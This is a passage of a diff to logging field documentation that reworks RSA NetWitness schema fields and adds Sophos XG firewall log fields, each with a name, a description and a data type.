+type: long -- -*`rsa.misc.cn_totbytsexp`*:: +*`rsa.network.dns_cname_record`*:: + -- type: keyword -- -*`rsa.misc.cn_totflowexp`*:: +*`rsa.network.dns_id`*:: + -- type: keyword -- -*`rsa.misc.cn_totpcktsexp`*:: +*`rsa.network.dns_opcode`*:: + -- type: keyword -- -*`rsa.misc.cn_unixnanosecs`*:: +*`rsa.network.dns_resp`*:: + -- type: keyword -- -*`rsa.misc.cn_v6flowlabel`*:: +*`rsa.network.dns_type`*:: + -- type: keyword -- -*`rsa.misc.cn_v6optheaders`*:: +*`rsa.network.domain1`*:: + -- type: keyword -- -*`rsa.misc.comp_class`*:: +*`rsa.network.host_type`*:: + -- type: keyword -- -*`rsa.misc.comp_name`*:: +*`rsa.network.packet_length`*:: + -- type: keyword -- -*`rsa.misc.comp_rbytes`*:: +*`rsa.network.host_orig`*:: + -- +This is used to capture the original hostname in case of a Forwarding Agent or a Proxy in between. + type: keyword -- -*`rsa.misc.comp_sbytes`*:: +*`rsa.network.rpayload`*:: + -- +This key is used to capture the total number of payload bytes seen in the retransmitted packets. + type: keyword -- -*`rsa.misc.cpu_data`*:: +*`rsa.network.vlan_name`*:: + -- +This key should only be used to capture the name of the Virtual LAN + type: keyword -- -*`rsa.misc.criticality`*:: + +*`rsa.investigations.ec_activity`*:: + -- +This key captures the particular event activity(Ex:Logoff) + type: keyword -- -*`rsa.misc.cs_agency_dst`*:: +*`rsa.investigations.ec_theme`*:: + -- +This key captures the Theme of a particular Event(Ex:Authentication) + type: keyword -- -*`rsa.misc.cs_analyzedby`*:: +*`rsa.investigations.ec_subject`*:: + -- +This key captures the Subject of a particular Event(Ex:User) + type: keyword -- -*`rsa.misc.cs_av_other`*:: +*`rsa.investigations.ec_outcome`*:: + -- +This key captures the outcome of a particular Event(Ex:Success) + type: keyword -- -*`rsa.misc.cs_av_primary`*:: +*`rsa.investigations.event_cat`*:: + -- -type: keyword +This key captures the Event category number + +type: long -- -*`rsa.misc.cs_av_secondary`*:: +*`rsa.investigations.event_cat_name`*:: + -- +This key captures the event category name corresponding to the event cat code + type: keyword -- -*`rsa.misc.cs_bgpv6nxthop`*:: +*`rsa.investigations.event_vcat`*:: + -- +This is a vendor supplied category. This should be used in situations where the vendor has adopted their own event_category taxonomy. + type: keyword -- -*`rsa.misc.cs_bit9status`*:: +*`rsa.investigations.analysis_file`*:: + -- +This is used to capture all indicators used in a File Analysis. This key should be used to capture an analysis of a file + type: keyword -- -*`rsa.misc.cs_context`*:: +*`rsa.investigations.analysis_service`*:: + -- +This is used to capture all indicators used in a Service Analysis. This key should be used to capture an analysis of a service + type: keyword -- -*`rsa.misc.cs_control`*:: +*`rsa.investigations.analysis_session`*:: + -- +This is used to capture all indicators used for a Session Analysis. This key should be used to capture an analysis of a session + type: keyword -- -*`rsa.misc.cs_data`*:: +*`rsa.investigations.boc`*:: + -- +This is used to capture behaviour of compromise + type: keyword -- -*`rsa.misc.cs_datecret`*:: +*`rsa.investigations.eoc`*:: + -- +This is used to capture Enablers of Compromise + type: keyword -- -*`rsa.misc.cs_dst_tld`*:: +*`rsa.investigations.inv_category`*:: + -- +This used to capture investigation category + type: keyword -- -*`rsa.misc.cs_eth_dst_ven`*:: +*`rsa.investigations.inv_context`*:: + -- +This used to capture investigation context + type: keyword -- -*`rsa.misc.cs_eth_src_ven`*:: +*`rsa.investigations.ioc`*:: + -- +This is key capture indicator of compromise + type: keyword -- -*`rsa.misc.cs_event_uuid`*:: + +*`rsa.counters.dclass_c1`*:: + -- -type: keyword +This is a generic counter key that should be used with the label dclass.c1.str only + +type: long -- -*`rsa.misc.cs_filetype`*:: +*`rsa.counters.dclass_c2`*:: + -- -type: keyword +This is a generic counter key that should be used with the label dclass.c2.str only + +type: long -- -*`rsa.misc.cs_fld`*:: +*`rsa.counters.event_counter`*:: + -- -type: keyword +This is used to capture the number of times an event repeated + +type: long -- -*`rsa.misc.cs_if_desc`*:: +*`rsa.counters.dclass_r1`*:: + -- +This is a generic ratio key that should be used with the label dclass.r1.str only + type: keyword -- -*`rsa.misc.cs_if_name`*:: +*`rsa.counters.dclass_c3`*:: + -- -type: keyword +This is a generic counter key that should be used with the label dclass.c3.str only + +type: long -- -*`rsa.misc.cs_ip_next_hop`*:: +*`rsa.counters.dclass_c1_str`*:: + -- +This is a generic counter string key that should be used with the label dclass.c1 only + type: keyword -- -*`rsa.misc.cs_ipv4dstpre`*:: +*`rsa.counters.dclass_c2_str`*:: + -- +This is a generic counter string key that should be used with the label dclass.c2 only + type: keyword -- -*`rsa.misc.cs_ipv4srcpre`*:: +*`rsa.counters.dclass_r1_str`*:: + -- +This is a generic ratio string key that should be used with the label dclass.r1 only + type: keyword -- -*`rsa.misc.cs_lifetime`*:: +*`rsa.counters.dclass_r2`*:: + -- +This is a generic ratio key that should be used with the label dclass.r2.str only + type: keyword -- -*`rsa.misc.cs_log_medium`*:: +*`rsa.counters.dclass_c3_str`*:: + -- +This is a generic counter string key that should be used with the label dclass.c3 only + type: keyword -- -*`rsa.misc.cs_loginname`*:: +*`rsa.counters.dclass_r3`*:: + -- +This is a generic ratio key that should be used with the label dclass.r3.str only + type: keyword -- -*`rsa.misc.cs_modulescore`*:: +*`rsa.counters.dclass_r2_str`*:: + -- +This is a generic ratio string key that should be used with the label dclass.r2 only + type: keyword -- -*`rsa.misc.cs_modulesign`*:: +*`rsa.counters.dclass_r3_str`*:: + -- +This is a generic ratio string key that should be used with the label dclass.r3 only + type: keyword -- -*`rsa.misc.cs_opswatresult`*:: + +*`rsa.identity.auth_method`*:: + -- +This key is used to capture authentication methods used only + type: keyword -- -*`rsa.misc.cs_payload`*:: +*`rsa.identity.user_role`*:: + -- +This key is used to capture the Role of a user only + type: keyword -- -*`rsa.misc.cs_registrant`*:: +*`rsa.identity.dn`*:: + -- +X.500 (LDAP) Distinguished Name + type: keyword -- -*`rsa.misc.cs_registrar`*:: +*`rsa.identity.logon_type`*:: + -- +This key is used to capture the type of logon method used. + type: keyword -- -*`rsa.misc.cs_represult`*:: +*`rsa.identity.profile`*:: + -- +This key is used to capture the user profile + type: keyword -- -*`rsa.misc.cs_rpayload`*:: +*`rsa.identity.accesses`*:: + -- +This key is used to capture actual privileges used in accessing an object + type: keyword -- -*`rsa.misc.cs_sampler_name`*:: +*`rsa.identity.realm`*:: + -- +Radius realm or similar grouping of accounts + type: keyword -- -*`rsa.misc.cs_sourcemodule`*:: +*`rsa.identity.user_sid_dst`*:: + -- +This key captures Destination User Session ID + type: keyword -- -*`rsa.misc.cs_streams`*:: +*`rsa.identity.dn_src`*:: + -- +An X.500 (LDAP) Distinguished name that is used in a context that indicates a Source dn + type: keyword -- -*`rsa.misc.cs_targetmodule`*:: +*`rsa.identity.org`*:: + -- +This key captures the User organization + type: keyword -- -*`rsa.misc.cs_v6nxthop`*:: +*`rsa.identity.dn_dst`*:: + -- +An X.500 (LDAP) Distinguished name that used in a context that indicates a Destination dn + type: keyword -- -*`rsa.misc.cs_whois_server`*:: +*`rsa.identity.firstname`*:: + -- +This key is for First Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.cs_yararesult`*:: +*`rsa.identity.lastname`*:: + -- +This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.description`*:: +*`rsa.identity.user_dept`*:: + -- +User's Department Names only + type: keyword -- -*`rsa.misc.devvendor`*:: +*`rsa.identity.user_sid_src`*:: + -- +This key captures Source User Session ID + type: keyword -- -*`rsa.misc.distance`*:: +*`rsa.identity.federated_sp`*:: + -- +This key is the Federated Service Provider. This is the application requesting authentication. + type: keyword -- -*`rsa.misc.dstburb`*:: +*`rsa.identity.federated_idp`*:: + -- +This key is the federated Identity Provider. This is the server providing the authentication. + type: keyword -- -*`rsa.misc.edomain`*:: +*`rsa.identity.logon_type_desc`*:: + -- +This key is used to capture the textual description of an integer logon type as stored in the meta key 'logon.type'. + type: keyword -- -*`rsa.misc.edomaub`*:: +*`rsa.identity.middlename`*:: + -- +This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.euid`*:: +*`rsa.identity.password`*:: + -- +This key is for Passwords seen in any session, plain text or encrypted + type: keyword -- -*`rsa.misc.facility`*:: +*`rsa.identity.host_role`*:: + -- +This key should only be used to capture the role of a Host Machine + type: keyword -- -*`rsa.misc.finterface`*:: +*`rsa.identity.ldap`*:: + -- +This key is for Uninterpreted LDAP values. Ldap Values that don’t have a clear query or response context + type: keyword -- -*`rsa.misc.flags`*:: +*`rsa.identity.ldap_query`*:: + -- +This key is the Search criteria from an LDAP search + type: keyword -- -*`rsa.misc.gaddr`*:: +*`rsa.identity.ldap_response`*:: + -- +This key is to capture Results from an LDAP search + type: keyword -- -*`rsa.misc.id3`*:: +*`rsa.identity.owner`*:: + -- +This is used to capture username the process or service is running as, the author of the task + type: keyword -- -*`rsa.misc.im_buddyname`*:: +*`rsa.identity.service_account`*:: + -- +This key is a windows specific key, used for capturing name of the account a service (referenced in the event) is running under. Legacy Usage + type: keyword -- -*`rsa.misc.im_croomid`*:: + +*`rsa.email.email_dst`*:: + -- +This key is used to capture the Destination email address only, when the destination context is not clear use email + type: keyword -- -*`rsa.misc.im_croomtype`*:: +*`rsa.email.email_src`*:: + -- +This key is used to capture the source email address only, when the source context is not clear use email + type: keyword -- -*`rsa.misc.im_members`*:: +*`rsa.email.subject`*:: + -- +This key is used to capture the subject string from an Email only. + type: keyword -- -*`rsa.misc.im_username`*:: +*`rsa.email.email`*:: + -- +This key is used to capture a generic email address where the source or destination context is not clear + type: keyword -- -*`rsa.misc.ipkt`*:: +*`rsa.email.trans_from`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.ipscat`*:: +*`rsa.email.trans_to`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.ipspri`*:: + +*`rsa.file.privilege`*:: + -- +Deprecated, use permissions + type: keyword -- -*`rsa.misc.latitude`*:: +*`rsa.file.attachment`*:: + -- +This key captures the attachment file name + type: keyword -- -*`rsa.misc.linenum`*:: +*`rsa.file.filesystem`*:: + -- type: keyword -- -*`rsa.misc.list_name`*:: +*`rsa.file.binary`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.load_data`*:: +*`rsa.file.filename_dst`*:: + -- +This is used to capture name of the file targeted by the action + type: keyword -- -*`rsa.misc.location_floor`*:: +*`rsa.file.filename_src`*:: + -- +This is used to capture name of the parent filename, the file which performed the action + type: keyword -- -*`rsa.misc.location_mark`*:: +*`rsa.file.filename_tmp`*:: + -- type: keyword -- -*`rsa.misc.log_id`*:: +*`rsa.file.directory_dst`*:: + -- +This key is used to capture the directory of the target process or file + type: keyword -- -*`rsa.misc.log_type`*:: +*`rsa.file.directory_src`*:: + -- +This key is used to capture the directory of the source process or file + type: keyword -- -*`rsa.misc.logid`*:: +*`rsa.file.file_entropy`*:: + -- -type: keyword +This is used to capture entropy vale of a file + +type: double -- -*`rsa.misc.logip`*:: +*`rsa.file.file_vendor`*:: + -- +This is used to capture Company name of file located in version_info + type: keyword -- -*`rsa.misc.logname`*:: +*`rsa.file.task_name`*:: + -- +This is used to capture name of the task + type: keyword -- -*`rsa.misc.longitude`*:: + +*`rsa.web.fqdn`*:: + -- +Fully Qualified Domain Names + type: keyword -- -*`rsa.misc.lport`*:: +*`rsa.web.web_cookie`*:: + -- +This key is used to capture the Web cookies specifically. + type: keyword -- -*`rsa.misc.mbug_data`*:: +*`rsa.web.alias_host`*:: + -- type: keyword -- -*`rsa.misc.misc_name`*:: +*`rsa.web.reputation_num`*:: + -- -type: keyword +Reputation Number of an entity. Typically used for Web Domains + +type: double -- -*`rsa.misc.msg_type`*:: +*`rsa.web.web_ref_domain`*:: + -- +Web referer's domain + type: keyword -- -*`rsa.misc.msgid`*:: +*`rsa.web.web_ref_query`*:: + -- +This key captures Web referer's query portion of the URL + type: keyword -- -*`rsa.misc.netsessid`*:: +*`rsa.web.remote_domain`*:: + -- type: keyword -- -*`rsa.misc.num`*:: +*`rsa.web.web_ref_page`*:: + -- +This key captures Web referer's page information + type: keyword -- -*`rsa.misc.number1`*:: +*`rsa.web.web_ref_root`*:: + -- +Web referer's root URL path + type: keyword -- -*`rsa.misc.number2`*:: +*`rsa.web.cn_asn_dst`*:: + -- type: keyword -- -*`rsa.misc.nwwn`*:: +*`rsa.web.cn_rpackets`*:: + -- type: keyword -- -*`rsa.misc.object`*:: +*`rsa.web.urlpage`*:: + -- type: keyword -- -*`rsa.misc.operation`*:: +*`rsa.web.urlroot`*:: + -- type: keyword -- -*`rsa.misc.opkt`*:: +*`rsa.web.p_url`*:: + -- type: keyword -- -*`rsa.misc.orig_from`*:: +*`rsa.web.p_user_agent`*:: + -- type: keyword -- -*`rsa.misc.owner_id`*:: +*`rsa.web.p_web_cookie`*:: + -- type: keyword -- -*`rsa.misc.p_action`*:: +*`rsa.web.p_web_method`*:: + -- type: keyword -- -*`rsa.misc.p_filter`*:: +*`rsa.web.p_web_referer`*:: + -- type: keyword -- -*`rsa.misc.p_group_object`*:: +*`rsa.web.web_extension_tmp`*:: + -- type: keyword -- -*`rsa.misc.p_id`*:: +*`rsa.web.web_page`*:: + -- type: keyword -- -*`rsa.misc.p_msgid1`*:: + +*`rsa.threat.threat_category`*:: + -- +This key captures Threat Name/Threat Category/Categorization of alert + type: keyword -- -*`rsa.misc.p_msgid2`*:: +*`rsa.threat.threat_desc`*:: + -- +This key is used to capture the threat description from the session directly or inferred + type: keyword -- -*`rsa.misc.p_result1`*:: +*`rsa.threat.alert`*:: + -- +This key is used to capture name of the alert + type: keyword -- -*`rsa.misc.password_chg`*:: +*`rsa.threat.threat_source`*:: + -- +This key is used to capture source of the threat + type: keyword -- -*`rsa.misc.password_expire`*:: + +*`rsa.crypto.crypto`*:: + -- +This key is used to capture the Encryption Type or Encryption Key only + type: keyword -- -*`rsa.misc.permgranted`*:: +*`rsa.crypto.cipher_src`*:: + -- +This key is for Source (Client) Cipher + type: keyword -- -*`rsa.misc.permwanted`*:: +*`rsa.crypto.cert_subject`*:: + -- +This key is used to capture the Certificate organization only + type: keyword -- -*`rsa.misc.pgid`*:: +*`rsa.crypto.peer`*:: + -- +This key is for Encryption peer's IP Address + type: keyword -- -*`rsa.misc.policyUUID`*:: +*`rsa.crypto.cipher_size_src`*:: + -- -type: keyword +This key captures Source (Client) Cipher Size + +type: long -- -*`rsa.misc.prog_asp_num`*:: +*`rsa.crypto.ike`*:: + -- +IKE negotiation phase. + type: keyword -- -*`rsa.misc.program`*:: +*`rsa.crypto.scheme`*:: + -- +This key captures the Encryption scheme used + type: keyword -- -*`rsa.misc.real_data`*:: +*`rsa.crypto.peer_id`*:: + -- +This key is for Encryption peer’s identity + type: keyword -- -*`rsa.misc.rec_asp_device`*:: +*`rsa.crypto.sig_type`*:: + -- +This key captures the Signature Type + type: keyword -- -*`rsa.misc.rec_asp_num`*:: +*`rsa.crypto.cert_issuer`*:: + -- type: keyword -- -*`rsa.misc.rec_library`*:: +*`rsa.crypto.cert_host_name`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.recordnum`*:: +*`rsa.crypto.cert_error`*:: + -- +This key captures the Certificate Error String + type: keyword -- -*`rsa.misc.ruid`*:: +*`rsa.crypto.cipher_dst`*:: + -- +This key is for Destination (Server) Cipher + type: keyword -- -*`rsa.misc.sburb`*:: +*`rsa.crypto.cipher_size_dst`*:: + -- -type: keyword +This key captures Destination (Server) Cipher Size + +type: long -- -*`rsa.misc.sdomain_fld`*:: +*`rsa.crypto.ssl_ver_src`*:: + -- +Deprecated, use version + type: keyword -- -*`rsa.misc.sec`*:: +*`rsa.crypto.d_certauth`*:: + -- type: keyword -- -*`rsa.misc.sensorname`*:: +*`rsa.crypto.s_certauth`*:: + -- type: keyword -- -*`rsa.misc.seqnum`*:: +*`rsa.crypto.ike_cookie1`*:: + -- +ID of the negotiation — sent for ISAKMP Phase One + type: keyword -- -*`rsa.misc.session`*:: +*`rsa.crypto.ike_cookie2`*:: + -- +ID of the negotiation — sent for ISAKMP Phase Two + type: keyword -- -*`rsa.misc.sessiontype`*:: +*`rsa.crypto.cert_checksum`*:: + -- type: keyword -- -*`rsa.misc.sigUUID`*:: +*`rsa.crypto.cert_host_cat`*:: + -- +This key is used for the hostname category value of a certificate + type: keyword -- -*`rsa.misc.spi`*:: +*`rsa.crypto.cert_serial`*:: + -- +This key is used to capture the Certificate serial number only + type: keyword -- -*`rsa.misc.srcburb`*:: +*`rsa.crypto.cert_status`*:: + -- +This key captures Certificate validation status + type: keyword -- -*`rsa.misc.srcdom`*:: +*`rsa.crypto.ssl_ver_dst`*:: + -- +Deprecated, use version + type: keyword -- -*`rsa.misc.srcservice`*:: +*`rsa.crypto.cert_keysize`*:: + -- type: keyword -- -*`rsa.misc.state`*:: +*`rsa.crypto.cert_username`*:: + -- type: keyword -- -*`rsa.misc.status1`*:: +*`rsa.crypto.https_insact`*:: + -- type: keyword -- -*`rsa.misc.svcno`*:: +*`rsa.crypto.https_valid`*:: + -- type: keyword -- -*`rsa.misc.system`*:: +*`rsa.crypto.cert_ca`*:: + -- +This key is used to capture the Certificate signing authority only + type: keyword -- -*`rsa.misc.tbdstr1`*:: +*`rsa.crypto.cert_common`*:: + -- +This key is used to capture the Certificate common name only + type: keyword -- -*`rsa.misc.tgtdom`*:: + +*`rsa.wireless.wlan_ssid`*:: + -- +This key is used to capture the ssid of a Wireless Session + type: keyword -- -*`rsa.misc.tgtdomain`*:: +*`rsa.wireless.access_point`*:: + -- +This key is used to capture the access point name. + type: keyword -- -*`rsa.misc.threshold`*:: +*`rsa.wireless.wlan_channel`*:: + -- -type: keyword +This is used to capture the channel names + +type: long -- -*`rsa.misc.type1`*:: +*`rsa.wireless.wlan_name`*:: + -- +This key captures either WLAN number/name + type: keyword -- -*`rsa.misc.udb_class`*:: + +*`rsa.storage.disk_volume`*:: + -- +A unique name assigned to logical units (volumes) within a physical disk + type: keyword -- -*`rsa.misc.url_fld`*:: +*`rsa.storage.lun`*:: + -- +Logical Unit Number.This key is a very useful concept in Storage. + type: keyword -- -*`rsa.misc.user_div`*:: +*`rsa.storage.pwwn`*:: + -- +This uniquely identifies a port on a HBA. + type: keyword -- -*`rsa.misc.userid`*:: + +*`rsa.physical.org_dst`*:: + -- +This is used to capture the destination organization based on the GEOPIP Maxmind database. + type: keyword -- -*`rsa.misc.username_fld`*:: +*`rsa.physical.org_src`*:: + -- +This is used to capture the source organization based on the GEOPIP Maxmind database. + type: keyword -- -*`rsa.misc.utcstamp`*:: + +*`rsa.healthcare.patient_fname`*:: + -- +This key is for First Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.v_instafname`*:: +*`rsa.healthcare.patient_id`*:: + -- +This key captures the unique ID for a patient + type: keyword -- -*`rsa.misc.virt_data`*:: +*`rsa.healthcare.patient_lname`*:: + -- +This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.vpnid`*:: +*`rsa.healthcare.patient_mname`*:: + -- +This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.autorun_type`*:: + +*`rsa.endpoint.host_state`*:: + -- -This is used to capture Auto Run type +This key is used to capture the current state of the machine, such as blacklisted, infected, firewall disabled and so on type: keyword -- -*`rsa.misc.cc_number`*:: +*`rsa.endpoint.registry_key`*:: + -- -Valid Credit Card Numbers only +This key captures the path to the registry key -type: long +type: keyword -- -*`rsa.misc.content`*:: +*`rsa.endpoint.registry_value`*:: + -- -This key captures the content type from protocol headers +This key captures values or decorators used within a registry entry type: keyword -- -*`rsa.misc.ein_number`*:: -+ --- -Employee Identification Numbers only +[float] +=== sophos -type: long --- -*`rsa.misc.found`*:: -+ --- -This is used to capture the results of regex match -type: keyword +[float] +=== xg --- +Module for parsing sophosxg syslog. -*`rsa.misc.language`*:: + + +*`sophos.xg.device`*:: + -- -This is used to capture list of languages the client support and what it prefers +device + type: keyword -- -*`rsa.misc.lifetime`*:: +*`sophos.xg.date`*:: + -- -This key is used to capture the session lifetime in seconds. +Date (yyyy-mm-dd) when the event occurred -type: long + +type: date -- -*`rsa.misc.link`*:: +*`sophos.xg.timezone`*:: + -- -This key is used to link the sessions together. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +Time (hh:mm:ss) when the event occurred + type: keyword -- -*`rsa.misc.match`*:: +*`sophos.xg.device_name`*:: + -- -This key is for regex match name from search.ini +Model number of the device + type: keyword -- -*`rsa.misc.param_dst`*:: +*`sophos.xg.device_id`*:: + -- -This key captures the command line/launch argument of the target process or file +Serial number of the device + type: keyword -- -*`rsa.misc.param_src`*:: +*`sophos.xg.log_id`*:: + -- -This key captures source parameter +Unique 12 characters code (0101011) + type: keyword -- -*`rsa.misc.search_text`*:: +*`sophos.xg.log_type`*:: + -- -This key captures the Search Text used +Type of event e.g. firewall event + type: keyword -- -*`rsa.misc.sig_name`*:: +*`sophos.xg.log_component`*:: + -- -This key is used to capture the Signature Name only. +Component responsible for logging e.g. Firewall rule + type: keyword -- -*`rsa.misc.snmp_value`*:: +*`sophos.xg.log_subtype`*:: + -- -SNMP set request value +Sub type of event + type: keyword -- -*`rsa.misc.streams`*:: +*`sophos.xg.hb_health`*:: + -- -This key captures number of streams in session +Heartbeat status -type: long --- +type: keyword +-- -*`rsa.db.index`*:: +*`sophos.xg.priority`*:: + -- -This key captures IndexID of the index. +Severity level of traffic + type: keyword -- -*`rsa.db.instance`*:: +*`sophos.xg.status`*:: + -- -This key is used to capture the database server instance name +Ultimate status of traffic – Allowed or Denied + type: keyword -- -*`rsa.db.database`*:: +*`sophos.xg.duration`*:: + -- -This key is used to capture the name of a database or an instance as seen in a session +Durability of traffic (seconds) -type: keyword + +type: long -- -*`rsa.db.transact_id`*:: +*`sophos.xg.fw_rule_id`*:: + -- -This key captures the SQL transantion ID of the current session +Firewall Rule ID which is applied on the traffic -type: keyword + +type: integer -- -*`rsa.db.permissions`*:: +*`sophos.xg.user_name`*:: + -- -This key captures permission or privilege level assigned to a resource. +user_name + type: keyword -- -*`rsa.db.table_name`*:: +*`sophos.xg.user_group`*:: + -- -This key is used to capture the table name +Group name to which the user belongs + type: keyword -- -*`rsa.db.db_id`*:: +*`sophos.xg.iap`*:: + -- -This key is used to capture the unique identifier for a database +Internet Access policy ID applied on the traffic + type: keyword -- -*`rsa.db.db_pid`*:: +*`sophos.xg.ips_policy_id`*:: + -- -This key captures the process id of a connection with database server +IPS policy ID applied on the traffic -type: long + +type: integer -- -*`rsa.db.lread`*:: +*`sophos.xg.policy_type`*:: + -- -This key is used for the number of logical reads +Policy type applied to the traffic -type: long + +type: keyword -- -*`rsa.db.lwrite`*:: +*`sophos.xg.appfilter_policy_id`*:: + -- -This key is used for the number of logical writes +Application Filter policy applied on the traffic -type: long + +type: integer -- -*`rsa.db.pread`*:: +*`sophos.xg.application_filter_policy`*:: + -- -This key is used for the number of physical writes +Application Filter policy applied on the traffic -type: long --- +type: integer +-- -*`rsa.network.alias_host`*:: +*`sophos.xg.application`*:: + -- -This key should be used when the source or destination context of a hostname is not clear.Also it captures the Device Hostname. Any Hostname that isnt ad.computer. +Application name + type: keyword -- -*`rsa.network.domain`*:: +*`sophos.xg.application_name`*:: + -- +Application name + + type: keyword -- -*`rsa.network.host_dst`*:: +*`sophos.xg.application_risk`*:: + -- -This key should only be used when it’s a Destination Hostname +Risk level assigned to the application + type: keyword -- -*`rsa.network.network_service`*:: +*`sophos.xg.application_technology`*:: + -- -This is used to capture layer 7 protocols/service names +Technology of the application + type: keyword -- -*`rsa.network.interface`*:: +*`sophos.xg.application_category`*:: + -- -This key should be used when the source or destination context of an interface is not clear +Application is resolved by signature or synchronized application + type: keyword -- -*`rsa.network.network_port`*:: +*`sophos.xg.appresolvedby`*:: + -- -Deprecated, use port. NOTE: There is a type discrepancy as currently used, TM: Int32, INDEX: UInt64 (why neither chose the correct UInt16?!) +Technology of the application -type: long + +type: keyword -- -*`rsa.network.eth_host`*:: +*`sophos.xg.app_is_cloud`*:: + -- -Deprecated, use alias.mac +Application is Cloud + type: keyword -- -*`rsa.network.sinterface`*:: +*`sophos.xg.in_interface`*:: + -- -This key should only be used when it’s a Source Interface +Interface for incoming traffic, e.g., Port A + type: keyword -- -*`rsa.network.dinterface`*:: +*`sophos.xg.out_interface`*:: + -- -This key should only be used when it’s a Destination Interface +Interface for outgoing traffic, e.g., Port B + type: keyword -- -*`rsa.network.vlan`*:: +*`sophos.xg.src_ip`*:: + -- -This key should only be used to capture the ID of the Virtual LAN +Original source IP address of traffic -type: long + +type: ip -- -*`rsa.network.zone_src`*:: +*`sophos.xg.src_mac`*:: + -- -This key should only be used when it’s a Source Zone. +Original source MAC address of traffic + type: keyword -- -*`rsa.network.zone`*:: +*`sophos.xg.src_country_code`*:: + -- -This key should be used when the source or destination context of a Zone is not clear +Code of the country to which the source IP belongs + type: keyword -- -*`rsa.network.zone_dst`*:: +*`sophos.xg.dst_ip`*:: + -- -This key should only be used when it’s a Destination Zone. +Original destination IP address of traffic -type: keyword + +type: ip -- -*`rsa.network.gateway`*:: +*`sophos.xg.dst_country_code`*:: + -- -This key is used to capture the IP Address of the gateway +Code of the country to which the destination IP belongs + type: keyword -- -*`rsa.network.icmp_type`*:: +*`sophos.xg.protocol`*:: + -- -This key is used to capture the ICMP type only +Protocol number of traffic -type: long + +type: keyword -- -*`rsa.network.mask`*:: +*`sophos.xg.src_port`*:: + -- -This key is used to capture the device network IPmask. +Original source port of TCP and UDP traffic -type: keyword + +type: integer -- -*`rsa.network.icmp_code`*:: +*`sophos.xg.dst_port`*:: + -- -This key is used to capture the ICMP code only +Original destination port of TCP and UDP traffic -type: long + +type: integer -- -*`rsa.network.protocol_detail`*:: +*`sophos.xg.icmp_type`*:: + -- -This key should be used to capture additional protocol information +ICMP type of ICMP traffic + type: keyword -- -*`rsa.network.dmask`*:: +*`sophos.xg.icmp_code`*:: + -- -This key is used for Destionation Device network mask +ICMP code of ICMP traffic + type: keyword -- -*`rsa.network.port`*:: +*`sophos.xg.sent_pkts`*:: + -- -This key should only be used to capture a Network Port when the directionality is not clear +Total number of packets sent + type: long -- -*`rsa.network.smask`*:: +*`sophos.xg.received_pkts`*:: + -- -This key is used for capturing source Network Mask +Total number of packets received -type: keyword + +type: long -- -*`rsa.network.netname`*:: +*`sophos.xg.sent_bytes`*:: + -- -This key is used to capture the network name associated with an IP range. This is configured by the end user. +Total number of bytes sent -type: keyword + +type: long -- -*`rsa.network.paddr`*:: +*`sophos.xg.recv_bytes`*:: + -- -Deprecated +Total number of bytes received -type: ip + +type: long -- -*`rsa.network.faddr`*:: +*`sophos.xg.trans_src_ ip`*:: + -- -type: keyword +Translated source IP address for outgoing traffic --- -*`rsa.network.lhost`*:: -+ --- -type: keyword +type: ip -- -*`rsa.network.origin`*:: +*`sophos.xg.trans_src_port`*:: + -- -type: keyword +Translated source port for outgoing traffic --- -*`rsa.network.remote_domain_id`*:: -+ --- -type: keyword +type: integer -- -*`rsa.network.addr`*:: +*`sophos.xg.trans_dst_ip`*:: + -- -type: keyword +Translated destination IP address for outgoing traffic + + +type: ip -- -*`rsa.network.dns_a_record`*:: +*`sophos.xg.trans_dst_port`*:: + -- -type: keyword +Translated destination port for outgoing traffic --- -*`rsa.network.dns_ptr_record`*:: -+ --- -type: keyword +type: integer -- -*`rsa.network.fhost`*:: +*`sophos.xg.srczonetype`*:: + -- +Type of source zone, e.g., LAN + + type: keyword -- -*`rsa.network.fport`*:: +*`sophos.xg.srczone`*:: + -- +Name of source zone + + type: keyword -- -*`rsa.network.laddr`*:: +*`sophos.xg.dstzonetype`*:: + -- +Type of destination zone, e.g., WAN + + type: keyword -- -*`rsa.network.linterface`*:: +*`sophos.xg.dstzone`*:: + -- +Name of destination zone + + type: keyword -- -*`rsa.network.phost`*:: +*`sophos.xg.dir_disp`*:: + -- +TPacket direction. Possible values:“org”, “reply”, “” + + type: keyword -- -*`rsa.network.ad_computer_dst`*:: +*`sophos.xg.connevent`*:: + -- -Deprecated, use host.dst +Event on which this log is generated + type: keyword -- -*`rsa.network.eth_type`*:: +*`sophos.xg.conn_id`*:: + -- -This key is used to capture Ethernet Type, Used for Layer 3 Protocols Only +Unique identifier of connection -type: long + +type: integer -- -*`rsa.network.ip_proto`*:: +*`sophos.xg.vconn_id`*:: + -- -This key should be used to capture the Protocol number, all the protocol nubers are converted into string in UI +Connection ID of the master connection -type: long + +type: integer -- -*`rsa.network.dns_cname_record`*:: +*`sophos.xg.idp_policy_id`*:: + -- -type: keyword +IPS policy ID which is applied on the traffic --- -*`rsa.network.dns_id`*:: -+ --- -type: keyword +type: integer -- -*`rsa.network.dns_opcode`*:: +*`sophos.xg.idp_policy_name`*:: + -- -type: keyword +IPS policy name i.e. IPS policy name which is applied on the traffic --- -*`rsa.network.dns_resp`*:: -+ --- type: keyword -- -*`rsa.network.dns_type`*:: +*`sophos.xg.signature_id`*:: + -- -type: keyword +Signature ID --- -*`rsa.network.domain1`*:: -+ --- type: keyword -- -*`rsa.network.host_type`*:: +*`sophos.xg.signature_msg`*:: + -- +Signature messsage + + type: keyword -- -*`rsa.network.packet_length`*:: +*`sophos.xg.classification`*:: + -- +Signature classification + + type: keyword -- -*`rsa.network.host_orig`*:: +*`sophos.xg.rule_priority`*:: + -- -This is used to capture the original hostname in case of a Forwarding Agent or a Proxy in between. +Priority of IPS policy + type: keyword -- -*`rsa.network.rpayload`*:: +*`sophos.xg.platform`*:: + -- -This key is used to capture the total number of payload bytes seen in the retransmitted packets. +Platform of the 